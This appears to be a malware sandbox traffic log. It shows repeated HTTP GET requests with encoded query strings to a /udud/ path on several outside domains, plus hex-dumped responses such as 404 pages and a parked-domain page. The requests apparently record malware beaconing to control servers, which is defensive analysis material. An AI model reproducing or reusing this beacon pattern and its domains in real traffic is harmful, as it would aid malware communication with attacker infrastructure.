                                                                                                Data Ascii: a148<!DOCTYPE html><html class="no-js" prefix="og: https://ogp.me/ns#" lang="it"><head><link rel="preconnect" href="https://d1di2lzuh97fh2.cloudfront.net" crossorigin><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><meta charset="utf-8"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e957" type="image/svg+xml" sizes="any"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957" type="image/svg+xml" sizes="16x16"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"><link rel="apple-touch-icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>40
                                                                                                May 27, 2024 12:38:13.184169054 CEST1289INData Raw: 34 20 2d 20 50 61 67 69 6e 61 20 6e 6f 6e 20 74 72 6f 76 61 74 61 20 3a 3a 20 6d 61 74 72 69 6d 6f 6e 69 6f 76 61 6c 65 6e 74 69 6e 61 65 74 6f 6d 6d 61 73 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77
                                                                                                Data Ascii: 4 - Pagina non trovata :: matrimoniovalentinaetommaso</title> <meta name="viewport" content="width=device-width,initial-scale=1"> <meta name="msapplication-tap-highlight" content="no"> <link href="https://d1di2lzuh97fh2.cloudfront.
                                                                                                May 27, 2024 12:38:13.184323072 CEST1289INData Raw: 61 2f 31 61 6e 2f 31 61 6e 66 70 67 2e 63 73 73 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 64 61 74 61 2d 77 6e 64 5f 74 79 70 6f 67 72 61 70 68 79 5f 66 69 6c 65 3d 22 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22
                                                                                                Data Ascii: a/1an/1anfpg.css?ph=cb3a78e957" data-wnd_typography_file=""><link rel="stylesheet" href="https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e957" data-wnd_typography_desktop_file="" media="screen and (min-width:37.5em)" dis
                                                                                                May 27, 2024 12:38:13.184390068 CEST1289INData Raw: 61 20 73 65 20 68 61 69 20 69 6e 73 65 72 69 74 6f 20 6c 27 69 6e 64 69 72 69 7a 7a 6f 20 63 6f 72 72 65 74 74 6f 2e 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 6e 61
                                                                                                Data Ascii: a se hai inserito l'indirizzo corretto."><meta name="keywords" content=""><meta name="generator" content="Webnode 2"><meta name="apple-mobile-web-app-capable" content="no"><meta name="apple-mobile-web-app-status-bar-style" content="black"><met
                                                                                                May 27, 2024 12:38:13.184416056 CEST1289INData Raw: 28 76 61 72 20 67 3d 31 3b 33 3e 3d 67 3b 67 2b 2b 29 62 2b 3d 28 22 30 22 2b 70 61 72 73 65 49 6e 74 28 68 5b 67 5d 2c 31 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 29 2e 73 6c 69 63 65 28 2d 32 29 3b 22 30 22 3d 3d 3d 62 2e 63 68 61 72 41 74
                                                                                                Data Ascii: (var g=1;3>=g;g++)b+=("0"+parseInt(h[g],10).toString(16)).slice(-2);"0"===b.charAt(0)&&(d=parseInt(b.substr(0,2),16),d=Math.max(16,d),b=d.toString(16)+b.slice(-4));f.push(c[e][0]+"="+b)}if(f.length){var k=a.getAttribute("data-src"),l=k+(0>k.in
                                                                                                May 27, 2024 12:38:13.184540987 CEST1289INData Raw: 2d 63 6c 61 73 73 69 63 20 77 6e 64 2d 6e 61 2d 63 20 6c 6f 67 6f 2d 63 6c 61 73 73 69 63 20 73 63 2d 77 20 20 20 77 6e 64 2d 77 2d 77 69 64 65 72 20 77 6e 64 2d 6e 68 2d 6d 20 68 6d 2d 68 69 64 64 65 6e 20 6d 65 6e 75 2d 64 65 66 61 75 6c 74 22
                                                                                                Data Ascii: -classic wnd-na-c logo-classic sc-w wnd-w-wider wnd-nh-m hm-hidden menu-default"><div class="s-w"><div class="s-o"><div class="s-bg"> <div class="s-bg-l"> </div></div><div class="h-w h-f wnd-f
                                                                                                May 27, 2024 12:38:13.184716940 CEST1289INData Raw: 09 3c 2f 6c 69 3e 3c 6c 69 3e 0a 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 2f 69 6c 2d 67 69 6f 72 6e 6f 2d 64 65 6c 2d 6d 61 74 72 69 6d 6f 6e 69 6f 2f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22
                                                                                                Data Ascii: </li><li><a class="menu-item" href="/il-giorno-del-matrimonio/"><span class="menu-item-text">Il giorno del matrimonio</span></a></li><li><a class="menu-item" href="/conferma-partecipazione/"><span class="menu-item-text">Conferma pa
                                                                                                May 27, 2024 12:38:13.184839010 CEST1289INData Raw: 65 20 63 6f 6e 74 72 6f 6c 6c 61 20 73 65 20 68 61 69 20 69 6e 73 65 72 69 74 6f 20 6c 27 69 6e 64 69 72 69 7a 7a 6f 20 63 6f 72 72 65 74 74 6f 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e
                                                                                                Data Ascii: e controlla se hai inserito l'indirizzo corretto.</p></div></div></div></div></div></div></div></section></div></div> </main> <footer class="l-f cf"> <div class="sw cf"><div class="sw-c cf"><
                                                                                                May 27, 2024 12:38:13.184853077 CEST1289INData Raw: 6c 69 6e 6b 22 3e 0d 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0d 0a 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                Data Ascii: link"> <a href="#" rel="nofollow">Cookies</a></span> </div> <div class="s-f-l-c-w"> <div class="s-f-lang lang-select cf"></div>
                                                                                                May 27, 2024 12:38:13.184916973 CEST1289INData Raw: 2e 36 35 20 36 35 2e 38 39 33 20 35 2e 36 35 73 36 2e 31 32 37 20 31 2e 31 36 20 36 2e 31 32 37 20 36 2e 37 30 37 7a 6d 2d 31 2e 38 34 38 20 30 63 30 2d 33 2e 34 38 2d 31 2e 32 37 2d 35 2e 30 30 34 2d 34 2e 32 34 32 2d 35 2e 30 30 34 2d 32 2e 39
                                                                                                Data Ascii: .65 65.893 5.65s6.127 1.16 6.127 6.707zm-1.848 0c0-3.48-1.27-5.004-4.242-5.004-2.936 0-4.205 1.523-4.205 5.004 0 3.48 1.27 5.003 4.205 5.003 2.937 0 4.242-1.523 4.242-5.003zM25.362 5.65c-5.91 0-5.693 5.51-5.693 6.888 0 5.402 3.226 6.526 5.945
                                                                                                May 27, 2024 12:38:13.370116949 CEST1289INData Raw: 2e 37 32 20 30 2d 35 2e 39 34 36 20 31 2e 31 36 2d 35 2e 39 34 36 20 36 2e 35 36 33 20 30 20 35 2e 39 38 32 20 33 2e 35 39 20 36 2e 38 39 20 35 2e 37 32 38 20 36 2e 38 39 20 34 2e 39 33 20 30 20 35 2e 32 39 34 2d 33 2e 31 35 35 20 35 2e 32 39 34
                                                                                                Data Ascii: .72 0-5.946 1.16-5.946 6.563 0 5.982 3.59 6.89 5.728 6.89 4.93 0 5.294-3.155 5.294-4.098V.9h-1.886z" fill="#FFF"></path> </svg> </span> </a></div></div><section class="cb cb-dark" id="cookiebar" style="display:none;"


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                94192.168.11.3049928203.161.49.19380
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:38:23.904166937 CEST478OUTGET /udud/?Pl9P8ldX=PsObB6+xPBRyZVNIbCvU2WSZgkCw8khE9p6p1fw7XNSxe8fb3H1JBnahW35XlkcpsNyADYDExmr6dQQdFworvtXhDNQSnK6hOqfzO1lUJ+gi+DatEY0x4VA=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:38:24.080528021 CEST548INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:38:23 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                95192.168.11.304992991.195.240.12380
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:38:29.292431116 CEST473OUTGET /udud/?Pl9P8ldX=pl+m+RwhDilgNhV8y9np651oviBSsBUAcSsMU8DJXuQO/zLKreqMvauOXyOp2DyQLR+zvzGH9k4G3Xo0zK83IFFyM0D1vpL10/nbh1uWm09odGxnF4xzrfg=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.l7aeh.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:38:29.519675016 CEST1289INHTTP/1.1 200 OK
                                                                                                date: Mon, 27 May 2024 10:38:29 GMT
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                transfer-encoding: chunked
                                                                                                vary: Accept-Encoding
                                                                                                x-powered-by: PHP/8.1.17
                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                pragma: no-cache
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_vZfSQlyoenW7FiQW009uFuaKcMnNFrDJ7SyVW/QTWmDFE2E7HNPzl1TA/mmwxM4mQpueHXtyaevKk2mklSVILg==
                                                                                                last-modified: Mon, 27 May 2024 10:38:29 GMT
                                                                                                x-cache-miss-from: parking-6cfd44ff49-s62jt
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Raw: 32 45 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 76 5a 66 53 51 6c 79 6f 65 6e 57 37 46 69 51 57 30 30 39 75 46 75 61 4b 63 4d 6e 4e 46 72 44 4a 37 53 79 56 57 2f 51 54 57 6d 44 46 45 32 45 37 48 4e 50 7a 6c 31 54 41 2f 6d 6d 77 78 4d 34 6d 51 70 75 65 48 58 74 79 61 65 76 4b 6b 32 6d 6b 6c 53 56 49 4c 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6c 37 61 65 68 2e 75 73 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 6c 37 61 65 68 20 52 65 73 6f 75 [TRUNCATED]
                                                                                                Data Ascii: 2EE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_vZfSQlyoenW7FiQW009uFuaKcMnNFrDJ7SyVW/QTWmDFE2E7HNPzl1TA/mmwxM4mQpueHXtyaevKk2mklSVILg==><head><meta charset="utf-8"><title>l7aeh.us&nbsp;-&nbsp;l7aeh Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="l7aeh.us is your first and best source for all of the information youre looking for. From general topics to more
                                                                                                May 27, 2024 12:38:29.519735098 CEST1289INData Raw: 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 6c 37 61 65 68 2e 75 73 20 68 61 73 20 69 74 20 61 6c 6c 2e 20 57 65 20 68 6f 70 65 20 79 6f 75 20 66 69 6e 64 20 77 68 61 74 20
                                                                                                Data Ascii: of what you would expect to find here, l7aeh.us has it all. We hope you find what you are searching for!"><link rel="icon" 570 type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style>
                                                                                                May 27, 2024 12:38:29.519774914 CEST1289INData Raw: 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69
                                                                                                Data Ascii: ,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}button::-moz-focus-inner,[
                                                                                                May 27, 2024 12:38:29.519835949 CEST1289INData Raw: 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e
                                                                                                Data Ascii: center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buybox__content-b
                                                                                                May 27, 2024 12:38:29.519891024 CEST1289INData Raw: 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63
                                                                                                Data Ascii: ntent-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color:#949494}.container
                                                                                                May 27, 2024 12:38:29.519915104 CEST1289INData Raw: 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 7d 2e
                                                                                                Data Ascii: align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.cookie-modal-window__content-t
                                                                                                May 27, 2024 12:38:29.519937992 CEST698INData Raw: 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f
                                                                                                Data Ascii: ium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opacity:0;width:0;height:0}.swi
                                                                                                May 27, 2024 12:38:29.519962072 CEST1289INData Raw: 41 45 43 0d 0a 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 37 62 66 66 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2b 2e 73 77 69 74 63 68 5f 5f 73
                                                                                                Data Ascii: AECinput:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);transform:translateX(26px
                                                                                                May 27, 2024 12:38:29.520119905 CEST1289INData Raw: 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72 65 70 65 61 74 20 74 6f 70 20 6c 65 66 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 39 34 25 20 36 34 30
                                                                                                Data Ascii: g.com/templates/bg/arrows.png") #0e162e no-repeat top left;background-size:94% 640px;flex-grow:1;position:inherit;top:90px;overflow:hidden;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-in
                                                                                                May 27, 2024 12:38:29.520144939 CEST1289INData Raw: 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e
                                                                                                Data Ascii: st-element-link:active,.two-tier-ads-list__list-element-link:focus{text-decoration:none}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.weba576rchive-block_
                                                                                                May 27, 2024 12:38:29.709311008 CEST1289INData Raw: 74 3a 31 30 70 78 3b 67 72 69 64 2d 61 72 65 61 3a 31 2f 31 2f 32 2f 32 7d 0a 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 76 61 72
                                                                                                Data Ascii: t:10px;grid-area:1/1/2/2} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"singleDomainName":"l7aeh.us","domainName":"l7aeh.us","domainPrice":0,"domainCurrency":"","adultFlag":false,"pu":"//www.l7aeh.us","dns


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                96192.168.11.3049930183.111.161.24380
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:38:35.017544985 CEST479OUTGET /udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.grimfilm.co.kr
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:38:35.439846039 CEST475INHTTP/1.1 301 Moved Permanently
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:38:35 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 0
                                                                                                Connection: close
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                X-Redirect-By: WordPress
                                                                                                Location: http://grimfilm.co.kr/udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                97192.168.11.30499313.64.163.5080
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:38:40.644901037 CEST479OUTGET /udud/?Pl9P8ldX=ZAUPc22UbAwlmqOcpZtb9jQGZGjNIs5k58OhtZslT+MlZ0MzYVnBwyOCsTvhGHepry8Cy/mecRlkAgE9OO4LtQYiaVzF77nK3tMxOKzIpokQntNvdpDg3pI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.mindfreak.live
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:38:40.829694033 CEST292INHTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:38:40 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 6e 64 66 72 65 61 6b 2e 6c 69 76 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.mindfreak.live/' />a </head>8</html>0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                98192.168.11.3049932203.161.49.19380
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:38:53.289335012 CEST475OUTGET /udud/?78wx=IVkh-DpXGR&Pl9P8ldX=PsObB6+xPBRyZVNIbCvU2WSZgkCw8khE9p6p1fw7XNSxe8fb3H1JBnahW35XlkcpsNyADYDExmr6dQQdFworvtXhDNQSnK6hOqfzO1lUJ+gi+DatEY0x4VA= HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:38:53.464199066 CEST548INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:38:53 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                99192.168.11.30499343.64.163.5080
                                                                                                TimestampBytes transferredDirectionData
